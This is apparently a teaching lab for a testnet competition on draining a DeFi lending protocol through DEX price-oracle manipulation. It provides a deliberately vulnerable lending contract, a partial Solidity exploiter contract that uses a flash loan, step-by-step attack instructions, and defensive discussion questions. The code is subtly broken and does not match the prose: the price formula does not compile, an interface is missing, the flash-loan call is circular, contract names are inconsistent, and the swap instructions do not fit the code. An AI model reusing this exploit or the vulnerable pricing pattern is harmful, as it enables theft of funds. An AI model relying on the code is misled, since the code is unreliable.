
# Exploiting a Lending Protocol via Oracle Manipulation

## Introduction

In this lab, you will play the role of a DeFi attacker exploiting a vulnerable lending protocol on the **Sepolia testnet**. The target is a simple lending contract that relies on a **price oracle** from a decentralized exchange. By manipulating the oracle's price feed, you'll trick the protocol into letting you drain its funds. The first student to pull off the exploit wins the largest "jackpot," and then the game continues with smaller jackpots so multiple students can succeed. 

**Setup assumptions:** You have an Ethereum wallet (MetaMask or similar) connected to Sepolia, some test **Sepolia ETH** for gas, and test tokens **TIGER** (a volatile collateral token) and **LUSD** (a stablecoin) in your wallet. The instructor will provide the contract addresses for the deployed lending protocol, the TIGER token, the LUSD token, and the price feed (Uniswap-like pair) on Sepolia. The instructor has pre-funded the lending pool with a supply of LUSD (the amount constituting the initial jackpot).

---

## The Vulnerable Lending Protocol

**Protocol Overview:** The lending contract allows users to **deposit TIGER tokens as collateral** and **borrow LUSD stablecoins** against that collateral. It determines the collateral’s value using a **price oracle** – in this case, the *current exchange rate from a TIGER/LUSD decentralized exchange pair*. There is no administrator setting the price; the contract simply trusts the DEX’s spot price. 

**Why it's vulnerable:** Using a live DEX price directly is dangerous because an attacker can **manipulate the price** with trades. The contract doesn’t use any time-weighted average or external oracle – it just reads the instantaneous pool ratio. This means a sudden buy or sell on the TIGER/LUSD pool can wildly skew the reported price. An attacker can pump the TIGER price to absurd levels *within one transaction*, tricking the lending contract into thinking the collateral is worth far more LUSD than it actually is. As one security analysis notes, protocols that naively use a liquidity pool’s spot price as their oracle are *“almost 100%” guaranteed to get rekt by a flash loan or price manipulation attack* ([The Full Guide to Price Oracle Manipulation Attacks](https://www.cyfrin.io/blog/price-oracle-manipulation-attacks-with-examples#:~:text=All%20these%20questions%20fit%20critically,with%20a%20larger%20market%20cap)).

**Contract behavior:** When you call the lending contract’s borrow function, it roughly does the following:

- **Checks your collateral value:** It queries the TIGER/LUSD pair for reserves to compute the price of TIGER. For example, if the pair has `(reserveTIGER, reserveLUSD)`, the price of 1 TIGER (in LUSD) might be calculated as `price = reserveLUSD / reserveTIGER`. Then `collateralValue = yourTigerBalance * price`. (No sanity checks or time averaging are applied.)
- **Ensures sufficient collateral:** If your collateral value (in LUSD) is *at least* the amount of LUSD you want to borrow, it proceeds. (For simplicity, assume a 1:1 collateral ratio requirement – no extra margin – making the exploit even easier.)
- **Transfers LUSD to you:** If the check passes, the contract transfers the requested LUSD from its pool to your address, as a loan.

Below is the core logic of the lending protocl:

```javascript
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "@uniswap/v3-core/contracts/interfaces/IUniswapV3Pool.sol";
import "@uniswap/v3-periphery/contracts/interfaces/ISwapRouter.sol";
import "@uniswap/v3-periphery/contracts/interfaces/IQuoter.sol";
import "@uniswap/lib/contracts/libraries/TransferHelper.sol";

interface IERC20 {
    function balanceOf(address) external view returns (uint256);
    function transfer(address, uint256) external returns (bool);
    function transferFrom(address, address, uint256) external returns (bool);
    function approve(address, uint256) external returns (bool);
}

interface IFlashLoanReceiver {
    function executeFlashLoan(uint256 amount) external;
}

contract LendingProtocol {
    IERC20 public immutable tiger;
    IERC20 public immutable lusd;
    IUniswapV3Pool public immutable pricePool;
    ISwapRouter public immutable swapRouter;
    
    mapping(address => uint256) public collateralBalance;
    mapping(address => bool) public blocked;
    uint256 public round = 1;
    uint256 public totalReserve; // Reserve for refilling
    uint256 public initialPoolSize;
    uint256 public flashLoanReserve; // 1 Billion LUSD for flash loans

    event Borrowed(address indexed user, uint256 amount);
    event ExploitDetected(address indexed exploiter, uint256 amount, uint256 newRound);
    event FlashLoanExecuted(address indexed borrower, uint256 amount);

    constructor(
        address _tiger, 
        address _lusd, 
        address _pool, 
        address _swapRouter,
        uint256 _initialPoolSize, 
        uint256 _reserve,
        uint256 _flashLoanReserve
    ) {
        tiger = IERC20(_tiger);
        lusd = IERC20(_lusd);
        pricePool = IUniswapV3Pool(_pool);
        swapRouter = ISwapRouter(_swapRouter);
        
        initialPoolSize = _initialPoolSize;
        totalReserve = _reserve;
        flashLoanReserve = _flashLoanReserve;

        // Fund initial lending pool
        require(lusd.transferFrom(msg.sender, address(this), _initialPoolSize), "Initial funding failed");
    }

    function depositCollateral(uint256 amount) external {
        require(!blocked[msg.sender], "blocked");
        require(tiger.transferFrom(msg.sender, address(this), amount), "Collateral transfer failed");
        collateralBalance[msg.sender] += amount;
    }

    function _getTigerPrice() internal view returns (uint256) {
        (int24 tick, , , , , , ) = pricePool.slot0();
        uint256 price = 1e18 * 1.0001**uint256(tick);
        return price;
    }

    function borrow(uint256 amountLUSD) external {
        require(!blocked[msg.sender], "blocked");

        uint256 collateralValue = collateralBalance[msg.sender] * _getTigerPrice() / 1e18;
        require(collateralValue >= amountLUSD, "Insufficient collateral value");
        require(lusd.balanceOf(address(this)) >= amountLUSD, "Not enough liquidity");

        lusd.transfer(msg.sender, amountLUSD);
        emit Borrowed(msg.sender, amountLUSD);

        // If exploited (full pool drain), trigger auto-refill
        if (lusd.balanceOf(address(this)) == 0) {
            blocked[msg.sender] = true;
            round += 1;
            uint256 refillAmount = initialPoolSize / round;

            if (totalReserve >= refillAmount) {
                totalReserve -= refillAmount;
                lusd.transfer(address(this), refillAmount);
            } else {
                refillAmount = totalReserve;
                totalReserve = 0;
            }

            emit ExploitDetected(msg.sender, amountLUSD, round);
        }
    }

    function requestFlashLoan(uint256 amount) external {
        require(amount <= flashLoanReserve, "Insufficient flash loan reserve");

        // Send the funds to the borrower
        lusd.transfer(msg.sender, amount);
        IFlashLoanReceiver(msg.sender).executeFlashLoan(amount);

        // Ensure full repayment
        require(lusd.balanceOf(address(this)) >= flashLoanReserve, "Flash loan not fully repaid");

        emit FlashLoanExecuted(msg.sender, amount);
    }
}

```

**Key vulnerability:** The `_getTigerPrice()` function simply uses the DEX reserve ratio as the price. If you can drastically lower `reserveTIGER` relative to `reserveLUSD` (by buying up TIGER from the pool), the calculated price skyrockets. The contract will think your collateral is worth a fortune in LUSD, allowing you to borrow the **entire LUSD pool** with a minimal amount of TIGER deposited. There are no oracles like Chainlink or time-weighted average prices (TWAP) to prevent this – it’s entirely trusting the manipulable spot price ([The Full Guide to Price Oracle Manipulation Attacks](https://www.cyfrin.io/blog/price-oracle-manipulation-attacks-with-examples#:~:text=,downside%20is%20that%20they%20are)).

**Addresses:**
- *Lending Contract:* Deployed at **`<LENDING_CONTRACT_ADDRESS>`** on Sepolia.
- *TIGER Token:* **`<TIGER_TOKEN_ADDRESS>`** (ERC20 used as collateral).
- *LUSD Token:* **`<LUSD_TOKEN_ADDRESS>`** (ERC20 stablecoin for loans).
- *TIGER/LUSD DEX Pair:* **`<UNISWAP_PAIR_ADDRESS>`** providing the price feed.

*📌 The instructor will provide the actual addresses above. Make sure to update your code/interaction scripts with these addresses.* 

---

## Exploit Strategy Overview

To exploit this lending protocol, the high-level strategy is:

1. **Acquire TIGER cheaply, then inflate its price.** Use LUSD to buy a large amount of TIGER from the TIGER/LUSD pool. This trade will remove TIGER from the pool and put in LUSD, causing the pool price of TIGER to shoot up (because now **each TIGER is backed by more LUSD in the pool**). In a real attack, this could be done with a flash loan so it all happens in one transaction, but here you can use your test funds directly.

2. **Borrow LUSD against overpriced TIGER collateral.** With the price now artificially high, even a small TIGER deposit is valued extremely high by the lending contract. You call the borrow function to take as much LUSD as possible. The goal is to **drain the LUSD pool** (the “jackpot”). Since the contract thinks your collateral is ample, it will give you all its LUSD.

3. *(Optional for profit realism)* You could swap back the TIGER for LUSD after borrowing, to return the price to normal and pocket the difference. However, in this simplified competition, you don’t actually need to do this to succeed – draining the pool is enough to win the round.

**Why a contract?** While you could attempt the steps manually (buy TIGER on a DEX, then call borrow), using a **custom exploit contract** has advantages:
- It lets you sequence actions within one transaction or script, making the exploit faster and more automated (important if racing other attackers).
- It can hold tokens and interact with multiple contracts (DEX and lending) in one place.
- You can easily reuse the exploit code for each attempt by just deploying a new instance (if your first address gets blocked).

In this lab, you are given a partially complete exploit contract. Your job is to fill in the missing pieces, deploy it, and execute the exploit.

---

## The Exploiter Contract (Fill-in-the-Blanks)

Below is the Solidity code for the exploiter contract, **with parts left blank** for you to complete. This contract will perform the two main actions: **manipulate the price** on the DEX, and then **borrow** from the lending protocol. Study the code and the comments, then fill in the `// TODO` sections.

```javascript
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "@uniswap/v3-periphery/contracts/interfaces/ISwapRouter.sol";
import "@uniswap/lib/contracts/libraries/TransferHelper.sol";

interface IERC20 {
    function balanceOf(address) external view returns (uint256);
    function transfer(address, uint256) external returns (bool);
    function transferFrom(address, address, uint256) external returns (bool);
    function approve(address, uint256) external returns (bool);
}

interface ILendingProtocol {
    function borrow(uint256 amount) external;
    function requestFlashLoan(uint256 amount) external;
}

contract Exploiter {
    IERC20 public immutable tiger;
    IERC20 public immutable lusd;
    ISwapRouter public immutable swapRouter;
    ILendingProtocol public immutable lending;

    address private constant SWAP_ROUTER = 0x3bFA4769FB09eefC5a80d6E87c3B9C650f7Ae48E;
    uint256 private constant MAX_UINT = 2**256 - 1;

    constructor(address _tiger, address _lusd, address _lending) {
        tiger = IERC20(_tiger);
        lusd = IERC20(_lusd);
        lending = ILendingProtocol(_lending);
        swapRouter = ISwapRouter(SWAP_ROUTER);
        
        // Approve max spending
        tiger.approve(SWAP_ROUTER, MAX_UINT);
        lusd.approve(SWAP_ROUTER, MAX_UINT);
    }

    function executeFlashLoan(uint256 flashAmount) external {
        // 1. Request a flash loan from the lending contract
        lending.________(flashAmount);  // TODO: Fill in function to request a flash loan

        // 2. Swap flash loaned LUSD for TIGER on Uniswap V3
        IV3SwapRouter.ExactInputSingleParams memory params = IV3SwapRouter.ExactInputSingleParams({
            tokenIn: lusd,
            tokenOut: tiger,
            fee: 3000, // Pool fee tier (0.3%)
            recipient: address(this),
            amountIn: flashAmount,
            amountOutMinimum: 0,
            sqrtPriceLimitX96: 0
        });

        uint256 amountTigerReceived = swapRouter.________(params); // TODO: Fill in function to execute the swap

        // 3. Use overpriced TIGER as collateral and borrow all available LUSD
        uint256 availableLusd = lusd.balanceOf(address(lending));
        lending.________(availableLusd);  // TODO: Fill in function to borrow max LUSD

        // 4. Repay flash loan
        lusd.________(address(lending), flashAmount);  // TODO: Fill in function to return flash loan

        // Exploiter now keeps remaining LUSD as profit
    }

    function exploit(uint256 flashAmount) external {
        executeFlashLoan(flashAmount);
    }
}
```

**Your tasks:**
- **Complete the swap call:** You need to specify `amountTigerOut` (or if the token order is reversed, use the other parameter) to withdraw TIGER from the DEX pair. Essentially, you want to pull out as much TIGER as you can. One simple approach is to input a very large number for `amountTigerOut` – the Uniswap pair will automatically give you the maximum it can up to that amount, in exchange for your LUSD. (The pair will take your LUSD because we approved it, and send TIGER to this contract.)
  - *Hint:* If TIGER is `token0` in the pair, use `pair.swap(<large_TIGER_amount>, 0, ...)`. If TIGER is `token1`, then use `pair.swap(0, <large_TIGER_amount>, ...)`. The instructor will clarify which side TIGER is on.
  - You might not know the exact TIGER reserve; an overly large number is fine as the pair will cap it to its reserve. For example, you could use the `lusdBalance` or even something like `type(uint256).max` for the output amount to attempt to take the max TIGER available.
- **Complete the borrow call:** After the swap, your contract will hold TIGER (which the lending contract will count as your collateral when you call `borrow`). Calculate the **pool’s LUSD balance** (we call it `poolLiquidity` above) by checking `lusd.balanceOf(lendingContractAddress)`. Then call `lending.borrow(poolLiquidity)`. This should withdraw all the LUSD from the lending contract into your exploit contract. 

Once these parts are filled in, you can compile and deploy this contract to Sepolia, then run the exploit.

---

## Deploying and Running the Exploit

Follow these steps to execute your attack on the Sepolia testnet:

1. **Get the contract addresses & tokens:** Make sure you have the addresses for the lending contract, TIGER token, LUSD token, and the TIGER/LUSD pair. Update the constructor parameters (or the placeholders in code) with these addresses.

2. **Compile the exploit contract:** You can use Remix (browser Solidity IDE) to compile the `OracleManipulationExploiter` contract. In Remix, paste the Solidity code (with your filled sections).

3. **Deploy the contract:** Deploy `OracleManipulationExploiter` to **Sepolia**. Use your wallet (connected to Sepolia) and be ready to confirm the transaction and pay a small amount of test ETH for gas. After deploying, note the **address of your exploit contract**.

4. **Fund the exploit contract with LUSD:** The contract needs LUSD in order to perform the swap. Transfer a chunk of your LUSD tokens to your newly deployed contract’s address. You can do this via MetaMask or Remix by calling the LUSD token’s `transfer` function to send tokens from your account to the contract. *Ensure the exploit contract now has a sufficient LUSD balance.* (You can verify by calling `lusd.balanceOf(exploitContractAddress)` on Etherscan or via a script.)

5. **Execute the attack (call `exploit()`):** In Remix, with the deployed exploit contract selected, call the `exploit()` function. This will trigger your contract to:
   - swap LUSD for TIGER on the DEX pair (manipulating the price), 
   - then borrow LUSD from the lending pool. 

   Confirm the transaction. If your exploit succeeds, this single transaction will drain the lending pool’s LUSD into your contract!

6. **Observe the outcome:** After running `exploit()`:
   - Check the **LUSD balance** of your exploit contract. It should have increased by the amount drained from the lending pool (minus whatever LUSD you spent on the swap). Essentially, this is your “stolen” amount.
   - Check the lending contract’s LUSD balance (you can use Etherscan or call the contract’s balance via a script). It should be near 0 because you borrowed everything.
   - The lending contract should have **blocked your address** (the exploit contract’s address) from further borrowing. If you try to call `borrow` again (or deposit more and borrow), it should revert with "blocked". This ensures you can’t win twice.
   - The instructor (or the contract itself, if automated) will now **refill the lending pool** with a smaller amount for the next round, as described below.

7. **Repeat for next rounds:** Other students can now deploy their own exploit contracts (or you could deploy another from a different address) to exploit the refilled pool. Each round, the available LUSD “jackpot” is reduced, so speed and efficiency matter!

**Tip:** If you encounter any issues (for example, the swap not pulling out as much TIGER as expected, or running out of gas), double-check:
   - That you used the correct parameter order for `pair.swap` (depending on which token is token0/token1).
   - Your contract has enough LUSD and approval was set (our constructor did approve the pair for LUSD).
   - Your borrow amount was correct (it should equal the pool’s full remaining LUSD). Borrowing *exactly* the pool balance ensures you drain it completely; if you borrow less, some tokens stay and the jackpot isn’t fully taken (allowing someone else to grab the rest).
   - That your address wasn’t already blocked (only happens if you already won in a prior round).

---

## Jackpot Rounds and blocking Mechanism

This lending contract is set up to allow **multiple exploits in succession**, so that after one student succeeds, others still have a chance (with diminishing rewards). Here’s how it works:

- **Initial round (Round 1):** The instructor funded the contract with the full original LUSD amount (the initial jackpot). The first student to exploit the contract will withdraw most or all of these funds. The contract then **blocks the exploiter’s address** (so the same student cannot simply repeat) and triggers the end of Round 1.

- **Refill for Round 2:** After the first drain, the contract refills the pool with **half of the original funds**. This is the Round 2 jackpot (for example, if original was 1,000 LUSD, it refills with 500 LUSD). Now a second student can perform the same exploit on a smaller pool. The second exploiter’s address will then be blocked as well.

- **Refill for Round 3:** The pool is refilled with **one-third of the original funds** (≈333 LUSD if original was 1000). A new attacker can win this amount. After draining, that address is blocked.

- **Subsequent rounds:** The pattern continues with the pool refilled to **one-quarter of original** for Round 4, **one-fifth** for Round 5, and so on. In general, after each successful exploit, the new pool size = **Original / (round number)**. The contract’s internal `round` counter increases each time to keep track of the fraction. 

This mechanism rewards the fastest student with the biggest haul, but still leaves opportunities for others to exploit the same vulnerability. 

**blocking:** The contract uses a mapping to permanently record addresses that have already won. If a blocked address tries to interact (deposit or borrow), the contract will reject them. This means each student should deploy a *new exploit contract (with a new address)* for their attempt, or use a different EOA (externally owned account) if interacting directly. In practice, deploying a new contract for each attempt is easiest (since each contract gets its own address).

*⚠️ Note:* All the exploits are happening on a public test network. Be mindful that anyone with the contract address and know-how could attempt the exploit. In a classroom setting, this is fine (and part of the fun), but remember on real networks this kind of vulnerability is catastrophic. Real attackers bundle steps into a single atomic transaction (often with flash loans) to ensure they cannot be outpaced or the price returns to normal before they act.

---

## Challenge: Defending Against Oracle Manipulation

You’ve seen how trivial it is to exploit a lending protocol that uses an **insecure price oracle**. **Why was this attack possible, and how could the protocol have been designed to prevent it?** Consider and discuss the following:

- **Oracle Design:** What if the protocol used a more reliable price feed instead of a raw DEX price? For example, **Chainlink** or another decentralized oracle network provides aggregated price data that is **significantly harder to manipulate** (an attacker would need to corrupt a majority of oracles ([The Full Guide to Price Oracle Manipulation Attacks](https://www.cyfrin.io/blog/price-oracle-manipulation-attacks-with-examples#:~:text=loans.%20,nodes%20on%20a%20price%20feed))】. How would using such an oracle help here?

- **Price Averaging:** DEXes like Uniswap v2/v3 offer a **Time-Weighted Average Price (TWAP)** oracle. This means the price is averaged over a window of time, making rapid swings (like those from flash trades) much less effective. Flash loan attacks usually manipulate price within one block, but a TWAP would **smooth out the price**, making the oracle **resistant to instantaneous manipulation* ([The Full Guide to Price Oracle Manipulation Attacks](https://www.cyfrin.io/blog/price-oracle-manipulation-attacks-with-examples#:~:text=,lagging%20indicator%20of%20price%20values))】. What are the trade-offs of using a TWAP (consider price latency vs. safety)?

- **Collateral and Liquidity Safeguards:** How might the lending protocol itself limit damage? Think about adding **collateralization ratios** (requiring more collateral than the value of the loan), **borrow limits**, or **circuit breakers** that pause borrowing if prices move too fast. Could requiring multiple price sources or a delay before using a new price update help?

Reflect on how real-world lending platforms (Compound, Aave, etc.) implement protections. By understanding these defenses, you’ll appreciate what goes into designing secure DeFi protocols and why oracle choice is critical. **Discuss your ideas** with the class or in your report – this is an open-ended challenge with multiple valid approaches.

---

**Congratulations** on completing the exploit lab! You’ve learned how oracle manipulation attacks can wreak havoc on insecure DeFi contracts. This hands-on experience should also underscore the importance of robust oracle mechanisms in any lending protocol. Now that you’ve seen how to break the system, think about how to build it stronger. Happy hacking (for education) ([The Full Guide to Price Oracle Manipulation Attacks](https://www.cyfrin.io/blog/price-oracle-manipulation-attacks-with-examples#:~:text=,decentralized%20in%20nature%2C%20are%20significantly)) ([The Full Guide to Price Oracle Manipulation Attacks](https://www.cyfrin.io/blog/price-oracle-manipulation-attacks-with-examples#:~:text=,lagging%20indicator%20of%20price%20values))】